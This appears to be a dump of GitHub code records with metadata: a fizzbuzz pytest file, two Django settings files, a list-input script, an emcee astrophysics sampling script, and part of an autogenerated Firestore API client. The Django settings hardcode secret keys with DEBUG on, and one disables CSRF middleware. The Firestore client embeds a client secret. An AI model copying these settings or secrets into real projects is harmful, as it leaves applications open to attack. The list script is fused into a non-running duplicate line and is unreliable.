[
"david@thinkingbinaries.com"
] |
david@thinkingbinaries.com
|
a5f5ad934ab6b4548d185c57b55e75a4fe701d2d
|
75dcb56e318688499bdab789262839e7f58bd4f6
|
/_algorithms_challenges/pybites/bitesofpy-master/!201-300/239/test_fizzbuzz.py
|
374796ea04fb39da68675115964e7be47e23b93c
|
[] |
no_license
|
syurskyi/Algorithms_and_Data_Structure
|
9a1f358577e51e89c862d0f93f373b7f20ddd261
|
929dde1723fb2f54870c8a9badc80fc23e8400d3
|
refs/heads/master
| 2023-02-22T17:55:55.453535
| 2022-12-23T03:15:00
| 2022-12-23T03:15:00
| 226,243,987
| 4
| 1
| null | 2023-02-07T21:01:45
| 2019-12-06T04:14:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 483
|
py
|
from fizzbuzz import fizzbuzz
# write one or more pytest functions below, they need to start with test_
def test_fizzbuzz_base():
assert fizzbuzz(1) == 1
assert fizzbuzz(2) == 2
def test_fizzbuzz_fizz():
assert fizzbuzz(3) == 'Fizz'
assert fizzbuzz(6) == 'Fizz'
def test_fizzbuzz_buzz():
assert fizzbuzz(5) == 'Buzz'
assert fizzbuzz(10) == 'Buzz'
def test_fizzbuzz_fizzbuzz():
assert fizzbuzz(15) == 'Fizz Buzz'
assert fizzbuzz(30) == 'Fizz Buzz'
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
6a0a01d92744efe31045b17e0d9e6e64dba5448a
|
8b2c5420f7e331fb6e48f3efd3cfc8a714291d4d
|
/finances/settings.py
|
7a343222fcdb21fb5e62ad3f6c5589226c6c6412
|
[] |
no_license
|
jjjggg092/finalproject
|
bc297c8b623937f28565591138534c762bf36560
|
1159ca8ae47b364f84586e39176b678c3feb42f9
|
refs/heads/master
| 2021-06-22T12:27:34.707772
| 2019-12-10T23:13:46
| 2019-12-10T23:13:46
| 227,138,704
| 0
| 0
| null | 2021-06-10T22:22:57
| 2019-12-10T14:18:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,124
|
py
|
"""
Django settings for finances project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c1+b$@a%ptdh=4=5i_4*6oa@k3*8+ezwc6__c^o!fszwf1=0gq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'money.apps.MoneyConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'finances.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'finances.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"jhon.goyes@yahoo.com"
] |
jhon.goyes@yahoo.com
|
00c5033bfa5fe0ed63fc2a721b1cf2c87e5f7225
|
8acbb01acf5c69806037669868bd07062cf2f7a0
|
/Django_demo/settings.py
|
6a7d0c4495dd4313bc760832cf389b1e0c8847c1
|
[] |
no_license
|
godhunter1993/Django
|
958c3ffe9c3bc28fbf0aa9f905a1867f52f7c4e4
|
e44c48f7c9e5aa1e5d484de3775d9902f5377b5f
|
refs/heads/master
| 2020-03-20T19:33:23.521774
| 2018-06-17T09:32:54
| 2018-06-17T09:32:54
| 137,642,783
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,256
|
py
|
"""
Django settings for Django_demo project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9anr*r86&2jplaj1i$$!)u1-)1x^4brr85=xcg78d68)i0pu17'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'learn',
'people',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Django_demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Django_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media').replace('\\', '/') # media即为图片上传的根路径
MEDIA_URL = '/media/'
|
[
"15150568410@139.com"
] |
15150568410@139.com
|
892e7b51d8d330acc1612ca799d59c9a0d25beb4
|
4b2450b65f5802f524ddb8701baa0e71c929889b
|
/listanelement.py
|
873b5eef153b5eefbef4658036e49176c3427331
|
[] |
no_license
|
joedave1/python
|
21e89dd0638156a3600bfb7fbf7422c73a79fc51
|
ae51152a663aa2e512c5be7f6134c4b35d78e88d
|
refs/heads/master
| 2020-06-29T11:22:05.627400
| 2019-08-16T08:51:14
| 2019-08-16T08:51:14
| 200,520,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 301
|
py
|
x=input("Enter a commc seperated list values: ").split(",")
color=list(x)
print("The first color is %s and the last color is %s"%(color[0],color[-1]))x=input("Enter a commc seperated list values: ").split(",")
color=list(x)
print("The first color is %s and the last color is %s"%(color[0],color[-1]))
|
[
"noreply@github.com"
] |
noreply@github.com
|
16d09cbbcb9e2143dfe40093700361425c5394ed
|
d92bad5384d80cf0f7e073bb7484b06514174f7a
|
/code/run_emcee_plPeak_noEvol_no190412.py
|
11ac3c75f9e4fae05fd3c145fe2fe6164833c64e
|
[] |
no_license
|
tcallister/BBH-spin-q-correlations
|
2abe399dc927a4cdbb47ac92ad6005cb3450e676
|
63dc9bbf9ca0c84a94ec0c616f8c2b3cfcceed26
|
refs/heads/main
| 2023-06-12T00:22:12.803326
| 2021-06-29T20:35:45
| 2021-06-29T20:35:45
| 348,101,610
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,874
|
py
|
import numpy as np
import glob
import emcee as mc
import h5py
import sys
from support import *
from likelihoods import *
# -- Set prior bounds --
priorDict = {
'lmbda':(-5,4),
'mMax':(60,100),
'm0':(20,100),
'sigM':(1,10),
'fPeak':(0,1),
'bq':(-2,10),
'sig_kappa':6.,
'mu':(-1,1),
'log_sigma':(-1.5,0.5),
'mMin':5.
}
# Dicts with samples:
sampleDict = np.load("/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/sampleDict.pickle")
sampleDict.pop('S190412m')
mockDetections = h5py.File('/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/o3a_bbhpop_inj_info.hdf','r')
ifar_1 = mockDetections['injections']['ifar_gstlal'].value
ifar_2 = mockDetections['injections']['ifar_pycbc_bbh'].value
ifar_3 = mockDetections['injections']['ifar_pycbc_full'].value
detected = (ifar_1>1) + (ifar_2>1) + (ifar_3>1)
m1_det = mockDetections['injections']['mass1_source'].value[detected]
m2_det = mockDetections['injections']['mass2_source'].value[detected]
s1z_det = mockDetections['injections']['spin1z'].value[detected]
s2z_det = mockDetections['injections']['spin2z'].value[detected]
z_det = mockDetections['injections']['redshift'].value[detected]
mockDetectionsO1O2 = h5py.File('/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/injections_O1O2an_spin.h5','r')
m1_det = np.append(m1_det,mockDetectionsO1O2['mass1_source'])
m2_det = np.append(m2_det,mockDetectionsO1O2['mass2_source'])
s1z_det = np.append(s1z_det,mockDetectionsO1O2['spin1z'])
s2z_det = np.append(s2z_det,mockDetectionsO1O2['spin2z'])
z_det = np.append(z_det,mockDetectionsO1O2['redshift'])
pop_reweight = injection_weights(m1_det,m2_det,s1z_det,s2z_det,z_det,mMin=priorDict['mMin'])
injectionDict = {
'm1':m1_det,
'm2':m2_det,
's1z':s1z_det,
's2z':s2z_det,
'z':z_det,
'weights':pop_reweight
}
nWalkers = 32
output = "/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/code/output/emcee_samples_plPeak_noEvol_no190412"
# Search for existing chains
old_chains = np.sort(glob.glob("{0}_r??.npy".format(output)))
# If no chain already exists, begin a new one
if len(old_chains)==0:
run_version = 0
# Initialize walkers from random positions in mu-sigma2 parameter space
initial_lmbdas = np.random.random(nWalkers)*(-2.)
initial_mMaxs = np.random.random(nWalkers)*20.+80.
initial_m0s = np.random.random(nWalkers)*10.+30
initial_sigMs = np.random.random(nWalkers)*4+1.
initial_fs = np.random.random(nWalkers)
initial_bqs = np.random.random(nWalkers)*2.
initial_ks = np.random.normal(size=nWalkers,loc=0,scale=1)+2.
initial_mus = np.random.random(nWalkers)*0.05
initial_sigmas = np.random.random(nWalkers)*0.5-1.
initial_walkers = np.transpose([initial_lmbdas,initial_mMaxs,initial_m0s,initial_sigMs,initial_fs,initial_bqs,initial_ks,initial_mus,initial_sigmas])
# Otherwise resume existing chain
else:
# Load existing file and iterate run version
old_chain = np.load(old_chains[-1])
run_version = int(old_chains[-1][-6:-4])+1
# Strip off any trailing zeros due to incomplete run
goodInds = np.where(old_chain[0,:,0]!=0.0)[0]
old_chain = old_chain[:,goodInds,:]
# Initialize new walker locations to final locations from old chain
initial_walkers = old_chain[:,-1,:]
print('Initial walkers:')
print(initial_walkers)
# Dimension of parameter space
dim = 9
# Run
nSteps = 10000
sampler = mc.EnsembleSampler(nWalkers,dim,logp_powerLawPeak_noEvol,args=[sampleDict,injectionDict,priorDict],threads=16)
for i,result in enumerate(sampler.sample(initial_walkers,iterations=nSteps)):
if i%10==0:
np.save("{0}_r{1:02d}.npy".format(output,run_version),sampler.chain)
np.save("{0}_r{1:02d}.npy".format(output,run_version),sampler.chain)
|
[
"thomas.a.callister@gmail.com"
] |
thomas.a.callister@gmail.com
|
22e5a66e84c47b3691015f299972b4f9e43427f4
|
71c331e4b1e00fa3be03b7f711fcb05a793cf2af
|
/QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/firestore/v1/firestore_v1_client.py
|
ac370070865d488484aa602c2024b65bf41079fa
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
iofh/QA-System
|
568228bb0c0adf9ec23b45cd144d61049e720002
|
af4a8f1b5f442ddf4905740ae49ed23d69afb0f6
|
refs/heads/master
| 2022-11-27T23:04:16.385021
| 2020-08-12T10:11:44
| 2020-08-12T10:11:44
| 286,980,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39,606
|
py
|
"""Generated client library for firestore version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.firestore.v1 import firestore_v1_messages as messages
class FirestoreV1(base_api.BaseApiClient):
"""Generated client library for service firestore version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://firestore.googleapis.com/'
MTLS_BASE_URL = 'https://firestore.mtls.googleapis.com/'
_PACKAGE = 'firestore'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/datastore']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'FirestoreV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new firestore handle."""
url = url or self.BASE_URL
super(FirestoreV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_databases_collectionGroups_fields = self.ProjectsDatabasesCollectionGroupsFieldsService(self)
self.projects_databases_collectionGroups_indexes = self.ProjectsDatabasesCollectionGroupsIndexesService(self)
self.projects_databases_collectionGroups = self.ProjectsDatabasesCollectionGroupsService(self)
self.projects_databases_documents = self.ProjectsDatabasesDocumentsService(self)
self.projects_databases_operations = self.ProjectsDatabasesOperationsService(self)
self.projects_databases = self.ProjectsDatabasesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsDatabasesCollectionGroupsFieldsService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups_fields resource."""
_NAME = 'projects_databases_collectionGroups_fields'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsFieldsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the metadata and configuration for a Field.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1Field) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields/{fieldsId}',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.fields.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsGetRequest',
response_type_name='GoogleFirestoreAdminV1Field',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists the field configuration and metadata for this database.
Currently, FirestoreAdmin.ListFields only supports listing fields
that have been explicitly overridden. To issue this query, call
FirestoreAdmin.ListFields with the filter set to
`indexConfig.usesAncestorConfig:false`.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1ListFieldsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.fields.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+parent}/fields',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsListRequest',
response_type_name='GoogleFirestoreAdminV1ListFieldsResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates a field configuration. Currently, field updates apply only to.
single field index configuration. However, calls to
FirestoreAdmin.UpdateField should provide a field mask to avoid
changing any configuration that the caller isn't aware of. The field mask
should be specified as: `{ paths: "index_config" }`.
This call returns a google.longrunning.Operation which may be used to
track the status of the field update. The metadata for
the operation will be the type FieldOperationMetadata.
To configure the default field settings for the database, use
the special `Field` with resource name:
`projects/{project_id}/databases/{database_id}/collectionGroups/__default__/fields/*`.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields/{fieldsId}',
http_method='PATCH',
method_id='firestore.projects.databases.collectionGroups.fields.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleFirestoreAdminV1Field',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsPatchRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class ProjectsDatabasesCollectionGroupsIndexesService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups_indexes resource."""
_NAME = 'projects_databases_collectionGroups_indexes'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsIndexesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a composite index. This returns a google.longrunning.Operation.
which may be used to track the status of the creation. The metadata for
the operation will be the type IndexOperationMetadata.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes',
http_method='POST',
method_id='firestore.projects.databases.collectionGroups.indexes.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/indexes',
request_field='googleFirestoreAdminV1Index',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesCreateRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a composite index.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes/{indexesId}',
http_method='DELETE',
method_id='firestore.projects.databases.collectionGroups.indexes.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a composite index.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1Index) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes/{indexesId}',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.indexes.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesGetRequest',
response_type_name='GoogleFirestoreAdminV1Index',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists composite indexes.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1ListIndexesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.indexes.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+parent}/indexes',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesListRequest',
response_type_name='GoogleFirestoreAdminV1ListIndexesResponse',
supports_download=False,
)
class ProjectsDatabasesCollectionGroupsService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups resource."""
_NAME = 'projects_databases_collectionGroups'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsDatabasesDocumentsService(base_api.BaseApiService):
"""Service class for the projects_databases_documents resource."""
_NAME = 'projects_databases_documents'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesDocumentsService, self).__init__(client)
self._upload_configs = {
}
def BatchGet(self, request, global_params=None):
r"""Gets multiple documents.
Documents returned by this method are not guaranteed to be returned in the
same order that they were requested.
Args:
request: (FirestoreProjectsDatabasesDocumentsBatchGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BatchGetDocumentsResponse) The response message.
"""
config = self.GetMethodConfig('BatchGet')
return self._RunMethod(
config, request, global_params=global_params)
BatchGet.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:batchGet',
http_method='POST',
method_id='firestore.projects.databases.documents.batchGet',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:batchGet',
request_field='batchGetDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsBatchGetRequest',
response_type_name='BatchGetDocumentsResponse',
supports_download=False,
)
def BeginTransaction(self, request, global_params=None):
r"""Starts a new transaction.
Args:
request: (FirestoreProjectsDatabasesDocumentsBeginTransactionRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BeginTransactionResponse) The response message.
"""
config = self.GetMethodConfig('BeginTransaction')
return self._RunMethod(
config, request, global_params=global_params)
BeginTransaction.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:beginTransaction',
http_method='POST',
method_id='firestore.projects.databases.documents.beginTransaction',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:beginTransaction',
request_field='beginTransactionRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsBeginTransactionRequest',
response_type_name='BeginTransactionResponse',
supports_download=False,
)
def Commit(self, request, global_params=None):
r"""Commits a transaction, while optionally updating documents.
Args:
request: (FirestoreProjectsDatabasesDocumentsCommitRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitResponse) The response message.
"""
config = self.GetMethodConfig('Commit')
return self._RunMethod(
config, request, global_params=global_params)
Commit.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:commit',
http_method='POST',
method_id='firestore.projects.databases.documents.commit',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:commit',
request_field='commitRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsCommitRequest',
response_type_name='CommitResponse',
supports_download=False,
)
def CreateDocument(self, request, global_params=None):
r"""Creates a new document.
Args:
request: (FirestoreProjectsDatabasesDocumentsCreateDocumentRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('CreateDocument')
return self._RunMethod(
config, request, global_params=global_params)
CreateDocument.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{collectionId}',
http_method='POST',
method_id='firestore.projects.databases.documents.createDocument',
ordered_params=['parent', 'collectionId'],
path_params=['collectionId', 'parent'],
query_params=['documentId', 'mask_fieldPaths'],
relative_path='v1/{+parent}/{collectionId}',
request_field='document',
request_type_name='FirestoreProjectsDatabasesDocumentsCreateDocumentRequest',
response_type_name='Document',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='DELETE',
method_id='firestore.projects.databases.documents.delete',
ordered_params=['name'],
path_params=['name'],
query_params=['currentDocument_exists', 'currentDocument_updateTime'],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a single document.
Args:
request: (FirestoreProjectsDatabasesDocumentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='GET',
method_id='firestore.projects.databases.documents.get',
ordered_params=['name'],
path_params=['name'],
query_params=['mask_fieldPaths', 'readTime', 'transaction'],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsGetRequest',
response_type_name='Document',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists documents.
Args:
request: (FirestoreProjectsDatabasesDocumentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDocumentsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}/{collectionId}',
http_method='GET',
method_id='firestore.projects.databases.documents.list',
ordered_params=['parent', 'collectionId'],
path_params=['collectionId', 'parent'],
query_params=['mask_fieldPaths', 'orderBy', 'pageSize', 'pageToken', 'readTime', 'showMissing', 'transaction'],
relative_path='v1/{+parent}/{collectionId}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsListRequest',
response_type_name='ListDocumentsResponse',
supports_download=False,
)
def ListCollectionIds(self, request, global_params=None):
r"""Lists all the collection IDs underneath a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsListCollectionIdsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListCollectionIdsResponse) The response message.
"""
config = self.GetMethodConfig('ListCollectionIds')
return self._RunMethod(
config, request, global_params=global_params)
ListCollectionIds.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}:listCollectionIds',
http_method='POST',
method_id='firestore.projects.databases.documents.listCollectionIds',
ordered_params=['parent'],
